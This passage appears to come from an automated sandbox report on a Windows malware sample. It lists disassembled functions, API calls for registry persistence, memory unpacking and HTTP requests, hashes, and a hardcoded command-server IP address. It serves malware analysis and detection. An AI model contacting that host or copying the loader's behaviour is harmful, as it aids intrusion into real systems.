                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                    • API String ID: 995133137-3578497191
                    • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                    • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                    • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                    • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                    Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 513 40512d-405150 510->513 514 4050ee-405128 510->514 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 513->515 514->513 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 541 4052f0-4052fb Sleep 535->541 542 4052ba-4052cd 535->542 539 405298-4052a6 536->539 540 4052ac-4052b3 call 409b7c 536->540 537->533 538->537 543 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->543 539->540 539->543 540->535 541->509 548 4052d0-4052d5 542->548 554 4059b0-4059c8 543->554 555 405984-405990 543->555 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->541 561 4052eb-4052ee 551->561 559 4059f2-405a0a 554->559 560 4059ca-4059d6 554->560 557 405992-4059a0 555->557 558 4059a6-4059ad call 409b7c 555->558 557->558 564 405a42-405a47 call 40cfef 557->564 558->554 562 405a34-405a41 call 409a17 559->562 563 405a0c-405a18 559->563 566 4059e8-4059ef call 409b7c 560->566 567 4059d8-4059e6 560->567 561->541 568 405300-405389 call 40b570 call 409b8a call 40b570 561->568 569 405a2a-405a31 call 409b7c 563->569 570 405a1a-405a28 563->570 566->559 567->564 567->566 586 405390-4053a2 568->586 569->562 570->564 570->569 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 590 4053fc-4053fe 587->590 591 40540d-405430 587->591 588->587 595 4053ba-4053f0 call 409fd7 call 409c7b 588->595 593 405400-40540b 590->593 594 405433-405438 591->594 593->591 593->593 594->594 596 40543a-4054dc call 402760 call 409310 594->596 595->587 605 4054f1-40550c call 401e50 596->605 606 4054de-4054e7 call 409a25 596->606 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->543 614->613 617 405693-40569c 615->617 618 40559e-4055a5 615->618 620 405578-405586 616->620 621 40558c-405593 call 409b7c 616->621 617->586 623 4056a2 617->623 618->617 624 4055ab-4055b3 618->624 620->543 620->621 621->615 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 623->627 628 4055b9-4055bc 624->628 629 40568d 624->629 658 405807-40580d 627->658 659 4057db-4057e7 627->659 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->617 637 4055f0-405602 call 40aff0 631->637 638 4055ec-4055ee 631->638 640 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->640 638->640 640->629 664 40565e-405669 call 403430 640->664 662 40583b-405853 658->662 663 40580f-40581b 658->663 660 4057e9-4057f7 659->660 661 4057fd-405804 call 409b7c 659->661 660->543 660->661 661->658 669 405855-405861 662->669 670 40587d-405895 662->670 666 405831-405838 call 409b7c 663->666 667 40581d-40582b 663->667 664->629 682 40566b-405679 call 403430 664->682 666->662 667->543 667->666 676 405873-40587a call 409b7c 669->676 677 405863-405871 669->677 671 405897-4058a3 670->671 672 4058bf-4058dc call 409a17 670->672 678 4058b5-4058bc call 409b7c 671->678 679 4058a5-4058b3 671->679 672->543 676->670 677->543 677->676 678->672 679->543 679->678 682->629 690 40567b-40568b call 403430 682->690 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 706 405736-405739 702->706 703->702 704->694 705 405768 704->705 705->627 706->704 707 40576a-40576f Sleep 706->707 707->627
                    APIs
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004050DD
                    • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                    • __Init_thread_footer.LIBCMT ref: 004053EB
                    • Sleep.KERNEL32(000007D0), ref: 00405755
                    • Sleep.KERNEL32(000007D0), ref: 0040576F
                    • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                    • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                    • API String ID: 606935701-1501174972
                    • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                    • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                    • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                    • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                    Function 047A8464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1355 47a8464-47a847d 1356 47a847f-47a8481 1355->1356 1357 47a8488-47a8494 CreateToolhelp32Snapshot 1356->1357 1358 47a8483 1356->1358 1359 47a8496-47a849c 1357->1359 1360 47a84a4-47a84b1 Module32First 1357->1360 1358->1357 1359->1360 1365 47a849e-47a84a2 1359->1365 1361 47a84ba-47a84c2 1360->1361 1362 47a84b3-47a84b4 call 47a8123 1360->1362 1366 47a84b9 1362->1366 1365->1356 1365->1360 1366->1361
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                    • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2
                    Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1371 4087e0-408807 call 402460 * 2 call 405a50 1377 40880c-408816 call 4106ab 1371->1377
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: mixtwo$nosub
                    • API String ID: 3472027048-187875987
                    • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                    • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                    • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                    • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                    Function 00706806 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1385 706806-706856 1391 706873-706877 1385->1391 1392 706857-70685c 1385->1392 1393 70688d-7068a9 VirtualProtect call 7068ac 1391->1393 1394 70687d 1391->1394 1392->1391 1394->1393
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: 4cb6c183d43e8fc2288822a573204162e5b2453ecf25750f029c2e2cbfc3349c
                    • Instruction ID: 52e027221de22c384212c66738c7f7a9fc369a946723064524be019914ce5a2d
                    • Opcode Fuzzy Hash: 4cb6c183d43e8fc2288822a573204162e5b2453ecf25750f029c2e2cbfc3349c
                    • Instruction Fuzzy Hash: BAF0A7B2908115FEEB10DF409530ABE3AF8EB85B30F30C715F806C65C1D2695C74A665
                    Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                      • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                    Strings
                    • text, xrefs: 00401B8F
                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                    • http://, xrefs: 00401EF4, 004021D3
                    • GET, xrefs: 004020E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                    • API String ID: 2146599340-4172842843
                    • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                    • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                    • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                    • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                    Function 0495003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 728 495003c-4950047 729 495004c-4950263 call 4950a3f call 4950e0f call 4950d90 VirtualAlloc 728->729 730 4950049 728->730 746 4950265-4950289 call 4950a69 729->746 747 495028b-4950292 729->747 733 495004a 730->733 733->733 751 49502ce-49503c2 VirtualProtect call 4950cce call 4950ce7 746->751 748 49502a1-49502b0 747->748 750 49502b2-49502cc 748->750 748->751 750->748 758 49503d1-49503e0 751->758 759 49503e2-4950437 call 4950ce7 758->759 760 4950439-49504b8 VirtualFree 758->760 759->758 762 49505f4-49505fe 760->762 763 49504be-49504cd 760->763 764 4950604-495060d 762->764 765 495077f-4950789 762->765 767 49504d3-49504dd 763->767 764->765 769 4950613-4950637 764->769 771 49507a6-49507b0 765->771 772 495078b-49507a3 765->772 767->762 768 49504e3-4950505 LoadLibraryA 767->768 773 4950517-4950520 768->773 774 4950507-4950515 768->774 777 495063e-4950648 769->777 775 49507b6-49507cb 771->775 776 495086e-49508be LoadLibraryA 771->776 772->771 778 4950526-4950547 773->778 774->778 779 49507d2-49507d5 775->779 785 49508c7-49508f9 776->785 777->765 780 495064e-495065a 777->780 783 495054d-4950550 778->783 781 4950824-4950833 779->781 782 49507d7-49507e0 779->782 780->765 784 4950660-495066a 780->784 793 4950839-495083c 781->793 788 49507e4-4950822 782->788 789 49507e2 782->789 790 4950556-495056b 783->790 791 49505e0-49505ef 783->791 792 495067a-4950689 784->792 786 4950902-495091d 785->786 787 49508fb-4950901 785->787 787->786 788->779 789->781 794 495056d 790->794 795 495056f-495057a 790->795 791->767 796 4950750-495077a 792->796 797 495068f-49506b2 792->797 793->776 798 495083e-4950847 793->798 794->791 800 495057c-4950599 795->800 801 495059b-49505bb 795->801 796->777 802 49506b4-49506ed 797->802 803 49506ef-49506fc 797->803 804 4950849 798->804 805 495084b-495086c 798->805 812 49505bd-49505db 800->812 801->812 802->803 806 49506fe-4950748 803->806 807 495074b 803->807 804->776 805->793 806->807 807->792 812->783
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0495024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: e66cd634b46ade7cedf94661ff97dd16c42cd12a520f0e41bcf94499f40e58ad
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: F2526D74A01229DFDB64CF58C985BACBBB5BF09304F1480E9E94DA7361DB30AA85DF14
                    Function 00405A50 Relevance: 11.2, APIs: 2, Strings: 5, Instructions: 678sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 813 405a50-406330 call 410822 call 4106e2 Sleep call 402760 * 2 call 403ab0 call 408ed0 call 408d80 * 3 call 406c40 call 408920 call 402460 call 408a70 call 402390 call 406ee0 call 4088e0 call 402460 call 408a70 call 402390 861 406404-40642f call 407290 call 4088e0 call 402460 call 408a70 call 402390 813->861 862 406336-4063ad call 406f60 call 4088e0 call 402460 call 4023e0 call 402390 call 406ff0 call 408900 call 402460 call 4023e0 call 402390 call 407070 call 408940 call 402460 call 408a70 call 402390 813->862 884 4064f3-40651e call 407630 call 4088c0 call 402460 call 408a70 call 402390 861->884 885 406435-4064ac call 407310 call 4088e0 call 402460 call 4023e0 call 402390 call 407390 call 408900 call 402460 call 4023e0 call 402390 call 407410 call 408940 call 402460 call 408a70 call 402390 861->885 954 4063cc-4063f7 call 407180 call 408940 call 402460 call 408a70 call 402390 862->954 955 4063af call 407100 862->955 918 406524-4065c1 call 4076b0 call 408920 call 402460 call 4023e0 call 402390 call 407730 call 408900 call 402460 call 4023e0 call 402390 call 4077b0 call 4088c0 call 402460 call 4023e0 call 402390 call 407830 call 4089c0 call 402460 call 408a70 call 402390 884->918 919 406608-406633 call 407a50 call 408890 call 402460 call 408a70 call 402390 884->919 1019 4064b8-4064e3 call 407520 call 408940 call 402460 call 408a70 call 402390 885->1019 1020 4064ae-4064b3 call 4074a0 885->1020 1147 4065c3-4065c8 call 4078c0 918->1147 1148 4065cd-4065f8 call 407940 call 4089c0 call 402460 call 408a70 call 402390 918->1148 966 4066b3-4066de call 407c70 call 408940 call 402460 call 408a70 call 402390 919->966 967 406635-4066ae call 407ae0 call 408900 call 402460 call 4023e0 call 402390 call 407b60 call 408940 call 402460 call 4023e0 call 402390 call 407bf0 call 4088c0 call 402460 call 4023e0 call 402390 919->967 1016 40687d-4069df call 4017a0 call 4083f0 call 408940 call 402460 call 408370 call 408920 call 402460 call 4082d0 call 4089a0 call 402460 call 408da0 call 408e00 call 408eb0 call 408e00 call 408eb0 call 408e00 call 402390 * 8 954->1016 1022 4063fd-406402 call 407210 954->1022 965 4063b4-4063c7 call 408920 call 402460 955->965 992 40686f-406878 call 4023e0 call 402390 965->992 1033 4066e0-406759 call 407d00 call 408900 call 402460 call 4023e0 call 402390 call 407d80 call 408920 call 402460 call 4023e0 call 402390 call 407e00 call 4088c0 call 402460 call 4023e0 call 402390 966->1033 1034 40675e-406789 call 407e80 call 408970 call 402460 call 408a70 call 402390 966->1034 967->1016 992->1016 1251 4069e5-4069fe call 402350 call 4021d0 1016->1251 1019->1016 1090 4064e9-4064ee call 4075b0 1019->1090 1020->965 1022->965 1033->1016 1099 40678b-4067dc call 407f10 call 408900 call 402460 call 4023e0 call 402390 call 407fd0 call 4088c0 call 402460 call 4023e0 call 402390 call 408050 1034->1099 1100 4067de-406809 call 4080d0 call 4088c0 call 402460 call 408a70 call 402390 1034->1100 1090->884 1224 40685c-40686c call 4088c0 call 402460 1099->1224 1100->1016 1166 40680b-406857 call 408150 call 408900 call 402460 call 4023e0 call 402390 call 4081d0 call 408920 call 402460 call 4023e0 call 402390 call 408250 1100->1166 1147->1148 1148->1016 1206 4065fe-406603 call 4079d0 1148->1206 1166->1224 1206->919 1224->992 1256 406a00-406a23 call 402210 call 402460 call 4025e0 1251->1256 1257 406a3e-406a45 Sleep 1251->1257 1256->1257 1264 406a47-406a9c call 402390 call 408c80 * 3 call 404f70 1256->1264 1257->1251
                    APIs
                      • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,73BDA22C), ref: 00410837
                      • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                    • API String ID: 2563648476-311857291
                    • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                    • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                    • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                    • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9
                    Function 00401E50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1274 401e50-401e9e 1275 401ea0-401ea5 1274->1275 1275->1275 1276 401ea7-402179 call 402760 * 2 call 40aff0 call 40d0f0 InternetOpenA 1275->1276 1289 4021a3-4021c0 call 409a17 1276->1289 1290 40217b-402187 1276->1290 1291 402199-4021a0 call 409b7c 1290->1291 1292 402189-402197 1290->1292 1291->1289 1292->1291 1294 4021c8-4021f9 call 40cfef call 401e50 1292->1294
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: http://
                    • API String ID: 0-1121587658
                    • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                    • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                    • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                    • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94
                    Function 00606B4B Relevance: 4.6, APIs: 3, Instructions: 114registryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1303 606b4b-60a8d2 1310 60a8d4-60a8ef RegOpenKeyA 1303->1310 1311 60a8fb-60a916 RegOpenKeyA 1303->1311 1310->1311 1312 60a8f1 1310->1312 1313 60a918-60a922 1311->1313 1314 60a92e-60a95a 1311->1314 1312->1311 1313->1314 1317 60a967-60a971 1314->1317 1318 60a95c-60a965 GetNativeSystemInfo 1314->1318 1319 60a973 1317->1319 1320 60a97d-60a98b 1317->1320 1318->1317 1319->1320 1322 60a997-60a99e 1320->1322 1323 60a98d 1320->1323 1324 60a9b1 1322->1324 1325 60a9a4-60a9ab 1322->1325 1323->1322 1326 60a9b6-60a9bd 1324->1326 1325->1324 1325->1326 1327 608982-608df8 1326->1327 1328 60a9c3-60a9fc 1326->1328
                    APIs
                    • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0060A8E7
                    • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 0060A90E
                    • GetNativeSystemInfo.KERNEL32(?), ref: 0060A965
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID: Open$InfoNativeSystem
                    • String ID:
                    • API String ID: 1247124224-0
                    • Opcode ID: 36d5b6e9c21d8abcd7cdcef39b8a262e8012dc77a26b304ac3de0961534107f5
                    • Instruction ID: 2d8d8014c43a29e3b9b4aa2dbdcbd777084760f71e58c0f7fb8591dc87ca9cc7
                    • Opcode Fuzzy Hash: 36d5b6e9c21d8abcd7cdcef39b8a262e8012dc77a26b304ac3de0961534107f5
                    • Instruction Fuzzy Hash: BF41817115420EDFEF25DFA0CD85BEF3BA6EB05340F110526D981C2A80DB764CA5CB5A
                    Function 00706839 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1331 706839-706856 1334 706873-706877 1331->1334 1335 706857-70685c 1331->1335 1336 70688d-7068a9 VirtualProtect call 7068ac 1334->1336 1337 70687d 1334->1337 1335->1334 1337->1336
                    APIs
                    • VirtualProtect.KERNEL32(?,00706802,00000004), ref: 0070689B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000706000.00000040.00000001.01000000.00000003.sdmp, Offset: 00706000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_706000_file.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: T@}
                    • API String ID: 544645111-1245257210
                    • Opcode ID: 7f1163518c9d8ce7789f66fff99b1fa5f3d38663bcc5c5ff9879b8fdc1499778
                    • Instruction ID: dedbfc5a40b337e1f3d924e5b04ea25b93734d45fa281e4edb1c8bcf8f83545b
                    • Opcode Fuzzy Hash: 7f1163518c9d8ce7789f66fff99b1fa5f3d38663bcc5c5ff9879b8fdc1499778
                    • Instruction Fuzzy Hash: AA01F96A50D291DFD702CF6085715EA7FF0DE1B720B24C6A7E846CB5C3C2184C2AE762
                    Function 00413CB9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1340 413cb9-413cc5 1341 413cf7-413d02 call 40d0dd 1340->1341 1342 413cc7-413cc9 1340->1342 1350 413d04-413d06 1341->1350 1344 413ce2-413cf3 RtlAllocateHeap 1342->1344 1345 413ccb-413ccc 1342->1345 1346 413cf5 1344->1346 1347 413cce-413cd5 call 412473 1344->1347 1345->1344 1346->1350 1347->1341 1352 413cd7-413ce0 call 4116b2 1347->1352 1352->1341 1352->1344
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 5(@
                    • API String ID: 1279760036-4133491027
                    • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                    • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                    • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                    • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED
                    Function 04950E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1368 4950e0f-4950e24 SetErrorMode * 2 1369 4950e26 1368->1369 1370 4950e2b-4950e2c 1368->1370 1369->1370
                    APIs
                    • SetErrorMode.KERNEL32(00000400,?,?,04950223,?,?), ref: 04950E19
                    • SetErrorMode.KERNEL32(00000000,?,?,04950223,?,?), ref: 04950E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
